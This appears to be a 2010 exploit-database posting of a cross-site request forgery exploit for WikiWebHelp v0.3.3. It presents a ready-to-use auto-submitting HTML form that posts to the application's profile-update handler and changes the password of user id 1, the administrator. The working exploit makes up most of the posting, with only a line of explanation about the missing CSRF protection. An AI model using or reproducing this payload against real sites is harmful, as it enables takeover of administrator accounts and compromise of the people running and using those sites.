Home / os / win7

[webapps / 0day] - WikiWebHelp v0.3.3 Cross-Site Request For

Posted on 12 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>WikiWebHelp v0.3.3 Cross-Site Request Forgery Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='WikiWebHelp v0.3.3 Cross-Site Request Forgery Vulnerability by Yoyahack in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>=========================================================== WikiWebHelp v0.3.3 Cross-Site Request Forgery Vulnerability =========================================================== #Blog: yoyahack.blogspot.com #Site: foro.undersecurity.net #Mail: yoyahack@undersecurity.net #CMS: WikiWebHelp The entire system is vulnerable to CSRF (Cross-site request forgery) since this does not include a system to prevent CSRF attacks ... Example Change the password of users, including the administrator. Exploit: &lt;form name=&quot;CSRF&quot; method=&quot;post&quot; action=&quot; http://127.0.0.1/wwh/handlers/updateprofile.php?id=1&quot;&gt; &lt;input type=&#039;hidden&#039; name=&#039;pass&#039; value=&#039;password&#039;&gt; &lt;input type=&#039;hidden&#039; name=&#039;confirm&#039; value=&#039;confirm_password&#039;&gt; &lt;input type=&#039;hidden&#039; name=&#039;email&#039; value=&#039;email&#039;&gt; &lt;input type=&#039;hidden&#039; name=&#039;sub&#039; value=&#039;on&#039;&gt; &lt;input type=&#039;hidden&#039; name=&#039;id&#039; value=&#039;1&#039;&gt; &lt;input type=&#039;hidden&#039; name=&#039;subscribe&#039; value=&#039;true&#039;&gt; &lt;script&gt;document.CSRF.submit()&lt;/script&gt; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-12]</pre></body></html>

 

TOP